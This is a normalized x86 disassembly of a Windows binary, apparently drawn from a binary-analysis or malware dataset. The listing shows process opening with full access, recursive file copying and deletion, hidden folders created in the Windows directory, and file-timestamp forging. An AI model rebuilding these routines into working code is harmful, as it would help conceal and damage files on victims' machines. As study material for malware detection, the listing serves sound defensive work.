je r-xdata
push eax
push 0x0
push 0x1f0fff
call [ OpenProcess@IAT ]
push esi
mov edi eax
call [ CloseHandle@IAT ]
mov eax [ esp + 0x13c ]
test eax eax
jne r-xdata
lea ecx [ esp + 0xc ]
push ecx
push esi
call Process32Next
test eax eax
je r-xdata
mov [ ebx ] edi
pop edi
pop esi
mov eax 0x1
pop ebx
add esp 0x128
retn
lea edi [ esp + 0x30 ]
or ecx 0xffffffff
xor eax eax
[ edi ]
not ecx
sub edi ecx
mov eax 0x1
mov edx ecx
mov esi edi
mov edi ebx
shr ecx 0x2
[ edi ] [ esi ]
mov ecx edx
and ecx 0x3
[ edi ] [ esi ]
pop edi
pop esi
pop ebx
add esp 0x128
retn
push esi
call [ CloseHandle@IAT ]
mov eax [ esp + 0x14 ]
cmp eax edi
jne r-xdata
sub_403760
sub esp 0x400
or ecx 0xffffffff
xor eax eax
lea edx [ esp + 0x200 ]
push ebx
push esi
push edi
mov edi [ rw-data ]
[ edi ]
not ecx
sub edi ecx
mov eax ecx
mov esi edi
mov edi edx
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
xor eax eax
and ecx 0x3
[ edi ] [ esi ]
lea edi [ esp + 0x20c ]
or ecx 0xffffffff
[ edi ]
mov eax [ rw-data ]
not ecx
dec ecx
mov ebx ecx
inc ebx
cmp ebx eax
jge r-xdata
mov [ rw-data ] 0x4f
call sub_403d70
pop edi
pop esi
pop ebx
add esp 0x400
retn
push ebp
lea edx [ esp + 0x10 ]
push 0x4c
push edx
call sub_403da0
add esp 0x8
lea ecx [ esp + 0x10 ]
push ecx
call [ __import_lookup_table_0(KERNEL32:DeleteFileA) ]
jmp r-xdata
lea edi [ esp + 0x210 ]
or ecx 0xffffffff
xor eax eax
lea edx [ esp + 0x10 ]
[ edi ]
not ecx
sub edi ecx
lea ebp [ esp + 0x10 ]
mov eax ecx
mov esi edi
mov edi edx
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
xor eax eax
and ecx 0x3
push eax
[ edi ] [ esi ]
mov ecx [ rw-data ]
lea edx [ ecx + ebx ]
or ecx 0xffffffff
mov edi edx
[ edi ]
not ecx
sub edi ecx
mov esi edi
mov edi ebp
mov ebp ecx
or ecx 0xffffffff
[ edi ]
mov ecx ebp
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx ebp
and ecx 0x3
[ edi ] [ esi ]
mov edi edx
or ecx 0xffffffff
[ edi ]
not ecx
dec ecx
lea edx [ esp + 0x14 ]
push edx
lea ebx [ ebx + ecx + 0x1 ]
call [ __import_lookup_table_0(KERNEL32:SetFileAttributesA) ]
mov eax [ rw-data ]
cmp [ eax + ebx ] 0x30
jne r-xdata
pop ebp
mov eax [ rw-data ]
inc ebx
cmp ebx eax
jl r-xdata
sub_403880
mov edx [ rw-data ]
push edi
mov edi edx
or ecx 0xffffffff
xor eax eax
[ edi ]
not ecx
dec ecx
lea eax [ ecx + edx + 0x1 ]
push eax
push edx
call [ __import_lookup_table_3(MSVCRT:rename) ]
add esp 0x8
neg eax
sbb al al
and al 0xf6
add al 0x4f
mov [ rw-data ] al
call sub_403d70
pop edi
retn
sub_4038c0
push ecx
mov edx [ rw-data ]
push ebx
push edi
mov edi edx
or ecx 0xffffffff
xor eax eax
[ edi ]
not ecx
dec ecx
mov edi edx
push edx
mov bl [ ecx + edx + 0x1 ]
or ecx 0xffffffff
[ edi ]
not ecx
dec ecx
mov edi edx
mov al [ ecx + edx + 0x2 ]
or ecx 0xffffffff
mov [ esp + 0xe ] al
xor eax eax
[ edi ]
not ecx
dec ecx
mov cl [ ecx + edx + 0x3 ]
mov [ esp + 0xf ] cl
call [ __import_lookup_table_0(KERNEL32:GetFileAttributesA) ]
mov cl 0x31
pop edi
cmp bl cl
pop ebx
jne r-xdata
and al 0xfe
or al 0x1
jmp r-xdata
and al 0xfd
or al 0x2
jmp r-xdata
cmp [ esp + 0x2 ] cl
jne r-xdata
and al 0xfb
or al 0x4
jmp r-xdata
cmp [ esp + 0x3 ] cl
jne r-xdata
mov edx [ rw-data ]
push eax
push edx
call [ __import_lookup_table_0(KERNEL32:SetFileAttributesA) ]
neg eax
sbb al al
and al 0xa
add al 0x45
mov [ rw-data ] al
call sub_403d70
pop ecx
retn
sub_403970
mov eax [ rw-data ]
push 0x0
push 0x2
push 0x2
push 0x0
push 0x0
push 0x40000000
push eax
call [ __import_lookup_table_0(KERNEL32:CreateFileA) ]
cmp eax 0xffffffff
je r-xdata
mov [ rw-data ] 0x45
push eax
call [ CloseHandle@IAT ]
mov [ rw-data ] 0x4f
jmp r-xdata
jmp sub_403d70
sub_4039b0
mov ecx [ rw-data ]
mov eax [ rw-data ]
sub esp 0x210
mov edx ecx
shr ecx 0x2
push ebx
push ebp
push esi
push edi
mov esi eax
lea edi [ esp + 0x20 ]
[ edi ] [ esi ]
mov ecx edx
push 0x5c
and ecx 0x3
push eax
[ edi ] [ esi ]
mov esi [ __import_lookup_table_3(MSVCRT:strrchr) ]
call esi
push eax
call sub_403c80
lea eax [ esp + 0x2c ]
push 0x5c
push eax
call esi
add esp 0x14
test eax eax
je r-xdata
mov edi rw-data
or ecx 0xffffffff
xor eax eax
lea edx [ esp + 0x20 ]
[ edi ]
not ecx
sub edi ecx
push 0x7d00
mov esi edi
mov ebx ecx
mov edi edx
or ecx 0xffffffff
[ edi ]
mov ecx ebx
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx ebx
mov [ esp + 0x1c ] 0x42
and ecx 0x3
[ edi ] [ esi ]
call [ __import_lookup_table_3(MSVCRT:malloc) ]
mov ebx eax
add esp 0x4
test ebx ebx
je r-xdata
mov [ eax + 0x1 ] 0x0
pop edi
pop esi
pop ebp
pop ebx
add esp 0x210
retn
lea eax [ esp + 0x20 ]
push eax
call sub_403c00
mov esi eax
add esp 0x4
cmp esi 0xffffffff
je r-xdata
push ebx
call [ __import_lookup_table_3(MSVCRT:free) ]
add esp 0x4
test esi esi
jne r-xdata
lea ecx [ esi + esi * 4 ]
lea edx [ esp + 0x18 ]
shl ecx 0x6
add ecx 0x5
push 0x5
push edx
mov [ esp + 0x21 ] ecx
call sub_401f50
add esp 0x8
lea eax [ esp + 0x20 ]
push ebx
push eax
call [ FindFirstFileA@IAT ]
mov edi eax
cmp edi 0xffffffff
jne r-xdata
mov esi 0x1
push ebx
call sub_403ce0
add esp 0x4
test eax eax
je r-xdata
or ecx eax
mov edi rw-data
xor eax eax
lea edx [ ebx + 0x2c ]
[ edi ]
not ecx
sub edi ecx
mov eax ecx
mov esi edi
mov edi edx
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
and ecx 0x3
[ edi ] [ esi ]
lea ecx [ esp + 0x10 ]
push ecx
push ebx
push 0x140
push ebx
call sub_402910
push 0x140
push ebx
call sub_401eb0
push ebx
call [ __import_lookup_table_3(MSVCRT:free) ]
add esp 0x1c
pop edi
pop esi
pop ebp
pop ebx
add esp 0x210
retn
xor ebp ebp
dec esi
test esi esi
mov [ esp + 0x10 ] esi
jle r-xdata
lea edx [ esp + 0x14 ]
push edx
push ebx
push 0x140
push ebx
call sub_402910
push 0x140
push ebx
call sub_401eb0
add esp 0x18
test eax eax
je r-xdata
push edi
call [ FindClose@IAT ]
push ebx
push edi
call sub_403ba0
add esp 0x8
cmp eax 0xffffffff
je r-xdata
push ebx
call [ __import_lookup_table_3(MSVCRT:free) ]
add esp 0x4
push edi
call [ FindClose@IAT ]
pop edi
pop esi
pop ebp
pop ebx
add esp 0x210
retn
add ebp eax
lea esi [ eax + eax * 4 ]
lea eax [ esp + 0x14 ]
shl esi 0x6
push eax
push ebx
push esi
push ebx
call sub_402910
push esi
push ebx
call sub_401eb0
add esp 0x18
test eax eax
je r-xdata
cmp ebp [ esp + 0x10 ]
jl r-xdata
sub_403ba0
push ebx
mov ebx [ esp + 0x8 ]
push ebp
mov ebp [ FindNextFileA@IAT ]
push esi
mov esi [ esp + 0x14 ]
push edi
push esi
push ebx
xor edi edi
call ebp
test eax eax
je r-xdata
mov eax edi
pop edi
pop esi
pop ebp
pop ebx
retn
mov eax [ rw-data ]
test eax eax
jne r-xdata
pop edi
pop esi
pop ebp
or eax 0xffffffff
pop ebx
retn
push esi
call sub_403ce0
add esp 0x4
test eax eax
je r-xdata
cmp edi 0x64
jge r-xdata
inc edi
add esi 0x140
push esi
push ebx
call ebp
test eax eax
jne r-xdata
sub_403c00
mov ecx [ esp + 0x4 ]
sub esp 0x140
lea eax [ esp ]
push ebx
push esi
push edi
push eax
push ecx
xor edi edi
call [ FindFirstFileA@IAT ]
mov esi eax
cmp esi 0xffffffff
je r-xdata
mov eax edi
pop edi
pop esi
pop ebx
add esp 0x140
retn
mov ebx [ FindNextFileA@IAT ]
mov eax [ rw-data ]
test eax eax
jne r-xdata
inc edi
push esi
call [ FindClose@IAT ]
pop edi
pop esi
or eax 0xffffffff
pop ebx
add esp 0x140
retn
lea eax [ esp + 0xc ]
push eax
push esi
call ebx
test eax eax
je r-xdata
push esi
call [ FindClose@IAT ]
jmp r-xdata
lea edx [ esp + 0xc ]
push edx
call sub_403ce0
add esp 0x4
test eax eax
je r-xdata
sub_403c80
mov edx [ esp + 0x4 ]
mov [ rw-data ] 0x0
test edx edx
je r-xdata
retn
push ebx
mov ebx [ __import_lookup_table_3(MSVCRT:strchr) ]
push esi
push edi
mov edi esi
or ecx 0xffffffff
xor eax eax
[ edi ]
not ecx
dec ecx
cmp ecx 0x2
jb r-xdata
mov [ edx ] 0x0
test edx edx
jne r-xdata
mov eax [ rw-data ]
mov [ eax * 4 + rw-data ] esi
inc eax
mov [ rw-data ] eax
lea esi [ edx + 0x1 ]
push 0x3b
push esi
call ebx
mov edx eax
add esp 0x8
test edx edx
je r-xdata
pop edi
pop esi
pop ebx
sub_403ce0
mov eax [ esp + 0x4 ]
push ebx
push ebp
push esi
mov cl [ eax ]
push edi
test cl 0x10
je r-xdata
add eax 0x2c
push 0x2e
push eax
call [ __import_lookup_table_3(MSVCRT:strrchr) ]
mov ebx eax
mov eax [ rw-data ]
add esp 0x8
xor ebp ebp
test eax eax
jle r-xdata
pop edi
pop esi
pop ebp
mov eax 0x1
pop ebx
retn
pop edi
pop esi
pop ebp
xor eax eax
pop ebx
retn
mov edi [ __import_lookup_table_0(KERNEL32:lstrcmpiA) ]
mov esi rw-data
test ebx ebx
je r-xdata
mov eax [ esi ]
push rw-data
push eax
call edi
test eax eax
je r-xdata
mov ecx [ esi ]
lea edx [ ebx + 0x1 ]
add ecx 0x2
push ecx
push edx
call edi
test eax eax
je r-xdata
mov eax [ rw-data ]
inc ebp
add esi 0x4
cmp ebp eax
jl r-xdata
jmp r-xdata
mov eax [ esi ]
push rw-data
push eax
call edi
test eax eax
je r-xdata
sub_403da0
mov eax [ rw-data ]
sub esp 0x844
test eax eax
push ebx
push ebp
push esi
push edi
je r-xdata
mov ebx [ esp + 0x858 ]
mov ebp [ __import_lookup_table_3(MSVCRT:sprintf) ]
push ebx
lea eax [ esp + 0x658 ]
push rw-data
push eax
call ebp
add esp 0xc
lea ecx [ esp + 0x14 ]
lea edx [ esp + 0x654 ]
push ecx
push edx
call [ FindFirstFileA@IAT ]
cmp eax 0xffffffff
mov [ esp + 0x10 ] eax
je r-xdata
pop edi
pop esi
pop ebp
xor eax eax
pop ebx
add esp 0x844
retn
cmp [ esp + 0x85c ] 0x4c
jne r-xdata
mov esi [ esp + 0x10 ]
lea eax [ esp + 0x14 ]
push eax
push esi
call [ FindNextFileA@IAT ]
test eax eax
je r-xdata
pop edi
pop esi
pop ebp
mov eax 0x1
pop ebx
add esp 0x844
retn
push ebx
call [ RemoveDirectoryA@IAT ]
test eax eax
jne r-xdata
push esi
call [ FindClose@IAT ]
cmp [ esp + 0x40 ] 0x2e
je r-xdata
pop edi
pop esi
pop ebp
pop ebx
add esp 0x844
retn
lea edi [ esp + 0x40 ]
or ecx 0xffffffff
xor eax eax
lea edx [ esp + 0x354 ]
[ edi ]
not ecx
sub edi ecx
mov eax ecx
mov esi edi
mov edi edx
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
mov al [ esp + 0x14 ]
and ecx 0x3
test al 0x10
[ edi ] [ esi ]
je r-xdata
lea eax [ esp + 0x354 ]
lea ecx [ esp + 0x154 ]
push eax
push ebx
push rw-data
push ecx
call ebp
mov eax [ esp + 0x86c ]
add esp 0x10
sub eax 0x4c
je r-xdata
lea ecx [ esp + 0x354 ]
lea edx [ esp + 0x454 ]
push ecx
push ebx
push rw-data
push edx
call ebp
mov esi [ esp + 0x86c ]
add esp 0x10
cmp esi 0x4e
jne r-xdata
lea eax [ esp + 0x154 ]
push 0x0
push eax
call [ __import_lookup_table_0(KERNEL32:SetFileAttributesA) ]
lea ecx [ esp + 0x154 ]
push ecx
call [ __import_lookup_table_0(KERNEL32:DeleteFileA) ]
jmp r-xdata
sub eax 0x2
je r-xdata
lea edx [ esp + 0x454 ]
push esi
push edx
call sub_403da0
add esp 0x8
test eax eax
je r-xdata
lea eax [ esp + 0x454 ]
push 0x46
push eax
call sub_404330
add esp 0x8
test eax eax
je r-xdata
lea edx [ esp + 0x154 ]
push 0x44
push edx
call sub_404330
add esp 0x8
test eax eax
je r-xdata
sub eax 0xb
jne r-xdata
mov ecx [ esp + 0x10 ]
push ecx
call [ FindClose@IAT ]
pop edi
pop esi
pop ebp
xor eax eax
pop ebx
add esp 0x844
retn
jmp r-xdata
mov edx [ esp + 0x10 ]
push edx
call [ FindClose@IAT ]
pop edi
pop esi
pop ebp
xor eax eax
pop ebx
add esp 0x844
retn
mov ecx [ rw-data ]
push 0xea60
push ecx
call [ __import_lookup_table_0(KERNEL32:WaitForSingleObject) ]
cmp eax 0x102
je r-xdata
mov eax [ rw-data ]
mov esi [ __import_lookup_table_0(KERNEL32:WaitForSingleObject) ]
push 0xea60
push eax
call esi
cmp eax 0x102
je r-xdata
lea edx [ esp + 0x14 ]
push edx
call sub_403ce0
add esp 0x4
test eax eax
je r-xdata
mov eax [ esp + 0x10 ]
push eax
call [ FindClose@IAT ]
pop edi
pop esi
pop ebp
xor eax eax
pop ebx
add esp 0x844
retn
lea ecx [ esp + 0x154 ]
push ecx
push 0x0
call sub_4043a0
add esp 0x8
test eax eax
je r-xdata
lea eax [ esp + 0x14 ]
lea ecx [ esp + 0x154 ]
push eax
push ecx
call sub_404620
add esp 0x8
jmp r-xdata
mov edx [ rw-data ]
push 0xea60
push edx
call esi
cmp eax 0x102
je r-xdata
jmp r-xdata
sub_404040
sub esp 0x200
mov [ rw-data ] 0x4f
push ebx
push esi
push edi
call sub_403d70
lea eax [ esp + 0xc ]
push 0x200
push eax
call [ __import_lookup_table_0(KERNEL32:GetWindowsDirectoryA) ]
mov edi rw-data
or ecx 0xffffffff
xor eax eax
lea edx [ esp + 0xc ]
[ edi ]
not ecx
sub edi ecx
push eax
mov esi edi
mov ebx ecx
mov edi edx
or ecx 0xffffffff
[ edi ]
mov ecx ebx
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx ebx
lea eax [ esp + 0x10 ]
and ecx 0x3
push eax
[ edi ] [ esi ]
call [ __import_lookup_table_0(KERNEL32:CreateDirectoryA) ]
lea ecx [ esp + 0xc ]
push ecx
call [ __import_lookup_table_0(KERNEL32:GetFileAttributesA) ]
or al 0x2
lea edx [ esp + 0xc ]
push eax
push edx
call [ __import_lookup_table_0(KERNEL32:SetFileAttributesA) ]
mov ecx [ rw-data ]
lea eax [ esp + 0xc ]
push eax
push ecx
call sub_4040e0
add esp 0x8
pop edi
pop esi
pop ebx
add esp 0x200
retn
sub_4040e0
mov eax [ rw-data ]
sub esp 0xe44
test eax eax
push ebx
push ebp
push esi
push edi
je r-xdata
mov eax [ esp + 0xe58 ]
mov ebp [ __import_lookup_table_3(MSVCRT:sprintf) ]
push eax
lea ecx [ esp + 0x858 ]
push rw-data
push ecx
call ebp
add esp 0xc
lea edx [ esp + 0x14 ]
lea eax [ esp + 0x854 ]
push edx
push eax
call [ FindFirstFileA@IAT ]
cmp eax 0xffffffff
mov [ esp + 0x10 ] eax
je r-xdata
pop edi
pop esi
pop ebp
xor eax eax
pop ebx
add esp 0xe44
retn
pop edi
pop esi
pop ebp
mov eax 0x1
pop ebx
add esp 0xe44
retn
mov ebx [ esp + 0xe5c ]
push esi
call [ FindClose@IAT ]
cmp [ esp + 0x40 ] 0x2e
je r-xdata
mov esi [ esp + 0x10 ]
lea ecx [ esp + 0x14 ]
push ecx
push esi
call [ FindNextFileA@IAT ]
test eax eax
je r-xdata
lea edi [ esp + 0x40 ]
or ecx 0xffffffff
xor eax eax
lea edx [ esp + 0x154 ]
[ edi ]
not ecx
sub edi ecx
mov eax ecx
mov esi edi
mov edi edx
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
mov al [ esp + 0x14 ]
and ecx 0x3
[ edi ] [ esi ]
mov ecx [ rw-data ]
test al 0x10
push ecx
push rw-data
je r-xdata
lea edx [ esp + 0x25c ]
push edx
call ebp
mov eax [ rw-data ]
add esp 0xc
mov ecx eax
inc eax
cmp ecx 0x1869f
mov [ rw-data ] eax
jle r-xdata
lea edx [ esp + 0x35c ]
push edx
call ebp
mov eax [ rw-data ]
add esp 0xc
mov ecx eax
inc eax
cmp ecx 0x1869f
mov [ rw-data ] eax
jle r-xdata
lea edx [ esp + 0x154 ]
push 0x2e
push edx
call [ __import_lookup_table_3(MSVCRT:strrchr) ]
mov ecx [ esp + 0xe60 ]
mov esi eax
lea eax [ esp + 0x15c ]
lea edx [ esp + 0xc5c ]
push eax
push ecx
push rw-data
push edx
call ebp
add esp 0x18
test esi esi
jne r-xdata
mov [ rw-data ] 0x0
mov eax [ esp + 0xe58 ]
lea edx [ esp + 0x154 ]
push edx
push eax
lea ecx [ esp + 0xa5c ]
push rw-data
push ecx
call ebp
lea edx [ esp + 0x364 ]
lea eax [ esp + 0x464 ]
push edx
push ebx
push rw-data
push eax
call ebp
add esp 0x20
lea ecx [ esp + 0x454 ]
push 0x0
push ecx
call [ __import_lookup_table_0(KERNEL32:CreateDirectoryA) ]
lea edx [ esp + 0x454 ]
lea eax [ esp + 0xa54 ]
push edx
push eax
call sub_4040e0
add esp 0x8
test eax eax
je r-xdata
mov [ rw-data ] 0x0
inc esi
lea edx [ esp + 0x254 ]
push esi
push edx
push ebx
lea eax [ esp + 0x660 ]
push rw-data
push eax
call ebp
add esp 0x14
lea eax [ esp + 0x254 ]
lea ecx [ esp + 0x654 ]
push eax
push ebx
push rw-data
push ecx
call ebp
add esp 0x10
jmp r-xdata
mov eax [ esp + 0x10 ]
push eax
call [ FindClose@IAT ]
pop edi
pop esi
pop ebp
xor eax eax
pop ebx
add esp 0xe44
retn
jmp r-xdata
lea ecx [ esp + 0x654 ]
push 0x0
lea edx [ esp + 0xc58 ]
push ecx
push edx
call [ CopyFileA@IAT ]
jmp r-xdata
sub_404330
sub esp 0x400
push ebx
push esi
mov esi [ esp + 0x40c ]
push edi
mov edi esi
or ecx 0xffffffff
xor eax eax
lea ebx [ esp + 0x11 ]
[ edi ]
mov al [ esp + 0x414 ]
mov edi esi
not ecx
dec ecx
mov [ esp + 0xc ] al
mov edx ecx
or ecx 0xffffffff
xor eax eax
add edx 0x6
[ edi ]
not ecx
sub edi ecx
mov [ esp + 0xd ] edx
mov eax ecx
mov esi edi
mov edi ebx
push edx
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
and ecx 0x3
[ edi ] [ esi ]
lea ecx [ esp + 0x10 ]
push ecx
call sub_401f50
add esp 0x8
pop edi
pop esi
pop ebx
add esp 0x400
retn
sub_4043a0
mov eax 0x2004
call sub_405c40
mov eax [ rw-data ]
push ebx
push ebp
push esi
cmp eax 0x53
push edi
mov ebp 0x1
je r-xdata
mov [ esp + 0x14 ] 0x53
cmp eax 0x59
sete al
dec eax
and al 0xec
add eax 0x59
mov [ esp + 0x14 ] al
jmp r-xdata
push 0x0
push esi
call [ __import_lookup_table_0(KERNEL32:GetFileSize) ]
mov ebx [ esp + 0x2018 ]
mov edx 0x5
sub edx ebx
push esi
add eax edx
mov [ esp + 0x19 ] eax
call [ CloseHandle@IAT ]
lea eax [ esp + 0x14 ]
push 0x5
push eax
call sub_401f50
add esp 0x8
test eax eax
jne r-xdata
cmp [ esp + 0x14 ] 0x59
jne r-xdata
mov edi [ esp + 0x201c ]
push 0x0
push 0x80
push 0x3
push 0x0
push 0x3
push 0x80000000
push edi
call [ __import_lookup_table_0(KERNEL32:CreateFileA) ]
mov esi eax
cmp esi 0xffffffff
jne r-xdata
push rw-data
push edi
call [ __import_lookup_table_3(MSVCRT:fopen) ]
mov edi eax
push 0x0
push ebx
push edi
call [ fseek@IAT ]
mov eax [ rw-data ]
add esp 0x14
test eax eax
jne r-xdata
pop edi
pop esi
pop ebp
pop ebx
add esp 0x2004
retn
mov [ rw-data ] 0x55
call sub_403d70
pop edi
pop esi
pop ebp
xor eax eax
pop ebx
add esp 0x2004
retn
lea ecx [ esp + 0x14 ]
push 0x6
push ecx
mov [ esp + 0x1d ] 0x6
call sub_401f50
add esp 0x8
mov eax 0x1
pop edi
pop esi
pop ebp
pop ebx
add esp 0x2004
retn
xor ebp ebp
mov ebx [ fread@IAT ]
cmp esi 0x2000
jne r-xdata
push edi
call [ fclose@IAT ]
add esp 0x4
mov eax ebp
pop edi
pop esi
pop ebp
pop ebx
add esp 0x2004
retn
mov eax [ rw-data ]
test eax eax
je r-xdata
push edi
push 0x2000
lea ecx [ esp + 0x1c ]
push 0x1
push ecx
call ebx
mov esi eax
lea edx [ esp + 0x20 ]
lea eax [ esp + 0x24 ]
push edx
push eax
lea ecx [ esp + 0x2c ]
push 0x2000
push ecx
call sub_402910
lea edx [ esp + 0x34 ]
push esi
push edx
call sub_401eb0
add esp 0x28
test eax eax
je r-xdata
sub_404540
mov eax [ rw-data ]
push 0x46
push eax
call sub_404330
mov ecx [ rw-data ]
add esp 0x8
push 0xea60
push ecx
call [ __import_lookup_table_0(KERNEL32:WaitForSingleObject) ]
cmp eax 0x102
je r-xdata
retn
mov edx [ rw-data ]
push 0x4e
push edx
call sub_403da0
add esp 0x8
mov [ rw-data ] 0x47
jmp sub_403d70
sub_404590
push esi
push edi
push 0xff
push rw-data
call [ __import_lookup_table_0(KERNEL32:GetWindowsDirectoryA) ]
mov edi rw-data
or ecx 0xffffffff
xor eax eax
push rw-data
[ edi ]
not ecx
sub edi ecx
mov esi edi
mov edx ecx
mov edi rw-data
or ecx 0xffffffff
[ edi ]
mov ecx edx
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx edx
and ecx 0x3
[ edi ] [ esi ]
mov edi [ __import_lookup_table_0(KERNEL32:DeleteFileA) ]
call edi
mov eax [ rw-data ]
push 0x5c
push eax
call [ __import_lookup_table_3(MSVCRT:strrchr) ]
mov esi eax
push esi
call sub_403c80
mov [ esi ] 0x0
mov ecx [ rw-data ]
push 0x59
push ecx
call sub_403da0
push rw-data
push 0x0
call sub_4043a0
add esp 0x1c
push rw-data
call edi
pop edi
pop esi
retn
sub_404620
push esi
push rw-data
push rw-data
call [ __import_lookup_table_3(MSVCRT:fopen) ]
mov esi eax
add esp 0x8
test esi esi
je r-xdata
pop esi
retn
mov edx [ esp + 0x8 ]
push ebx
push edi
mov edi edx
or ecx 0xffffffff
xor eax eax
[ edi ]
mov edi [ fwrite@IAT ]
push esi
not ecx
push ecx
push 0x1
push edx
call edi
mov ebx [ esp + 0x24 ]
push esi
push 0x8
push 0x1
lea eax [ ebx + 0x14 ]
push eax
call edi
push esi
push 0x4
add ebx 0x20
push 0x1
push ebx
call edi
push esi
call [ fclose@IAT ]
add esp 0x34
pop edi
pop ebx
sub_404680
mov eax [ rw-data ]
sub esp 0x104
test eax eax
push ebx
push esi
push edi
jne r-xdata
push rw-data
push rw-data
call [ __import_lookup_table_3(MSVCRT:fopen) ]
mov edi eax
add esp 0x8
test edi edi
jne r-xdata
mov eax [ rw-data ]
or ecx 0xffffffff
mov [ rw-data ] 0x1
lea edx [ eax + 0x4 ]
xor eax eax
mov edi edx
[ edi ]
not ecx
dec ecx
mov ebx ecx
cmp ebx 0x114
jae r-xdata
mov esi [ rw-data ]
mov eax [ rw-data ]
push eax
call [ fclose@IAT ]
add esp 0x4
mov [ rw-data ] 0x45
call sub_403d70
pop edi
pop esi
pop ebx
add esp 0x104
retn
pop edi
pop esi
pop ebx
add esp 0x104
retn
mov edi edx
or ecx 0xffffffff
[ edi ]
not ecx
sub edi ecx
mov eax [ rw-data ]
mov edx ecx
mov esi edi
mov edi rw-data
shr ecx 0x2
[ edi ] [ esi ]
mov ecx edx
and ecx 0x3
cmp eax 0x56
[ edi ] [ esi ]
jne r-xdata
mov [ rw-data ] 0x0
mov [ rw-data ] 0x4f
call sub_403d70
push rw-data
call sub_4048a0
mov eax [ rw-data ]
add esp 0x4
cmp eax 0x56
jne r-xdata
push 0x0
push rw-data
call [ __import_lookup_table_0(KERNEL32:SetFileAttributesA) ]
mov ecx [ rw-data ]
cmp [ ecx ] 0x0
je r-xdata
lea eax [ esp + 0x10 ]
push 0x100
push eax
call [ __import_lookup_table_0(KERNEL32:GetWindowsDirectoryA) ]
or ecx 0xffffffff
mov edi rw-data
xor eax eax
lea edx [ esp + 0x10 ]
[ edi ]
not ecx
sub edi ecx
mov esi edi
mov edi edx
mov edx ecx
or ecx 0xffffffff
[ edi ]
mov ecx edx
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx edx
lea edx [ esp + 0x10 ]
and ecx 0x3
[ edi ] [ esi ]
mov edi rw-data
or ecx 0xffffffff
[ edi ]
not ecx
sub edi ecx
mov esi edi
mov edi edx
mov edx ecx
or ecx 0xffffffff
[ edi ]
mov ecx edx
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx edx
and ecx 0x3
[ edi ] [ esi ]
lea edi [ esp + 0x10 ]
or ecx 0xffffffff
[ edi ]
not ecx
sub edi ecx
mov eax ecx
mov esi edi
mov edi rw-data
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
and ecx 0x3
[ edi ] [ esi ]
push rw-data
call sub_404e40
add esp 0x4
push rw-data
push rw-data
jmp r-xdata
mov eax [ rw-data ]
mov edx [ rw-data ]
sub eax ebx
lea esi [ edx + ebx + 0x5 ]
sub eax 0x5
jmp r-xdata
mov [ rw-data ] 0x45
call sub_403d70
pop edi
pop esi
pop ebx
add esp 0x104
retn
push rw-data
call [ __import_lookup_table_3(MSVCRT:fopen) ]
mov edi eax
add esp 0x8
test edi edi
jne r-xdata
lea ecx [ esp + 0xc ]
mov [ esp + 0xc ] eax
push ecx
push esi
push eax
push esi
call sub_402910
mov edx [ esp + 0x1c ]
push edi
push edx
push 0x1
push esi
call [ fwrite@IAT ]
push edi
call [ fclose@IAT ]
mov eax [ rw-data ]
add esp 0x24
test eax eax
je r-xdata
sub_4048a0
sub esp 0x408
lea eax [ esp + 0x8 ]
push ebx
push esi
push edi
push 0x400
push eax
call [ __import_lookup_table_0(KERNEL32:GetWindowsDirectoryA) ]
mov esi [ __import_lookup_table_0(KERNEL32:CreateFileA) ]
push 0x0
push 0x2000000
push 0x3
push 0x0
push 0x5
lea ecx [ esp + 0x28 ]
push 0x80000000
push ecx
call esi
mov edi eax
cmp edi 0xffffffff
je r-xdata
pop edi
pop esi
pop ebx
add esp 0x408
retn
mov ebx [ esp + 0x418 ]
push 0x0
push 0x80
push 0x3
push 0x0
push 0x0
push 0x40000000
push ebx
call esi
mov esi eax
cmp esi 0xffffffff
jne r-xdata
push 0x0
lea edx [ esp + 0x10 ]
push 0x0
push edx
push edi
call [ GetFileTime@IAT ]
lea eax [ esp + 0xc ]
lea ecx [ esp + 0xc ]
push eax
lea edx [ esp + 0x10 ]
push ecx
push edx
push esi
call [ SetFileTime@IAT ]
push edi
mov edi [ CloseHandle@IAT ]
call edi
push esi
call edi
push ebx
call [ __import_lookup_table_0(KERNEL32:GetFileAttributesA) ]
or al 0x2
push eax
push ebx
call [ __import_lookup_table_0(KERNEL32:SetFileAttributesA) ]
push edi
call [ CloseHandle@IAT ]
pop edi
pop esi
pop ebx
add esp 0x408
retn
sub_404960
sub esp 0x4c4
mov ecx [ esp + 0x4c8 ]
lea eax [ esp + 0x4 ]
push eax
push 0x20008
push ecx
mov [ esp + 0x14 ] 0x100
mov [ esp + 0xc ] 0xc8
call [ OpenProcessToken@IAT ]
test eax eax
jne r-xdata
mov ecx [ esp + 0x4 ]
lea edx [ esp + 0xc ]
push edx
lea eax [ esp + 0xe0 ]
push 0x3e8
push eax
push 0x1
push ecx
call [ __import_lookup_table_1(ADVAPI32:GetTokenInformation) ]
test eax eax
jne r-xdata
add esp 0x4c4
retn
lea edx [ esp + 0x10 ]
lea eax [ esp ]
push edx
lea ecx [ esp + 0x18 ]
push eax
mov eax [ esp + 0x4d4 ]
lea edx [ esp + 0x10 ]
push ecx
mov ecx [ esp + 0xe8 ]
push edx
push eax
push ecx
push 0x0
call [ __import_lookup_table_1(ADVAPI32:LookupAccountSidA) ]
neg eax
sbb eax eax
neg eax
add esp 0x4c4
retn
add esp 0x4c4
retn
sub_404a00
mov eax 0x4038
call sub_405c40
mov eax [ rw-data ]
push ebx
push ebp
push esi
push edi
mov edi 0x2
xor ebp ebp
push rw-data
push eax
mov [ esp + 0x2c ] edi
mov [ esp + 0x30 ] ebp
mov [ esp + 0x34 ] 0x3
mov [ esp + 0x38 ] edi
mov [ esp + 0x3c ] ebp
mov [ esp + 0x40 ] ebp
mov [ esp + 0x44 ] ebp
mov [ esp + 0x48 ] ebp
mov [ esp + 0x18 ] 0x4000
mov [ esp + 0x1c ] 0xffffffff
mov ebx 0x5
mov [ esp + 0x50 ] 0x47
